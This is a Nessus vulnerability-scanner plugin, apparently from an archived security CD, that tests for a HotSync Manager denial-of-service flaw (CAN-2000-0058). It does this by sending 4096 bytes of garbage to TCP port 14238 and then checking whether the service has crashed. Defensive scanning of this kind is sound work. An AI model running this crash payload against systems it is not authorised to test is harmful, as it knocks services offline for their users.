home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / hotsync.nasl < prev    next >
Text File  |  2005-03-31  |  1KB  |  66 lines

  1. #
  2. # This script was written by Noam Rathaus <noamr@securiteam.com>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #
  7. if(description)
  8. {
  9.  script_id(10102);
  10.  script_bugtraq_id(920);
  11.  script_version ("$Revision: 1.11 $");
  12.  script_cve_id("CAN-2000-0058");
  13.  name["english"] = "HotSync Manager Denial of Service attack";
  14.  script_name(english:name["english"]);
  15.  
  16. desc["english"] = "It is possible to cause HotSync Manager to crash by 
  17. sending a few bytes
  18. of garbage into its listening port TCP 14238.
  19.  
  20. Solution: Block those ports from outside communication
  21.  
  22. Risk factor : Low";
  23.  
  24.  script_description(english:desc["english"]);
  25.  
  26.  summary["english"] = "HotSync Manager Denial of Service attack";
  27.  script_summary(english:summary["english"]);
  28.  
  29.  script_category(ACT_DENIAL);
  30.  
  31.  script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
  32.  family["english"] = "Denial of Service";
  33.  family["francais"] = "DΘni de service";
  34.  script_family(english:family["english"], francais:family["francais"]);
  35.  script_require_ports(14238);
  36.  
  37.  exit(0);
  38. }
  39.  
  40. #
  41. # The script code starts here
  42. #
  43.  
  44. if (get_port_state(14238))
  45. {
  46.  sock14238 = open_sock_tcp(14238);
  47.  if (sock14238)
  48.  {
  49.   data_raw = crap(4096) + string("\n");
  50.   send(socket:sock14238, data:data_raw);
  51.   close(sock14238);
  52.  
  53.   sleep(5);
  54.  
  55.   sock14238_sec = open_sock_tcp(14238);
  56.   if (sock14238_sec)
  57.   {
  58.    security_warning(port:14238, data:"HotSync Manager port is open.");
  59.   }
  60.   else
  61.   {
  62.    security_hole(port:14238);
  63.   }
  64.  }
  65. }
  66.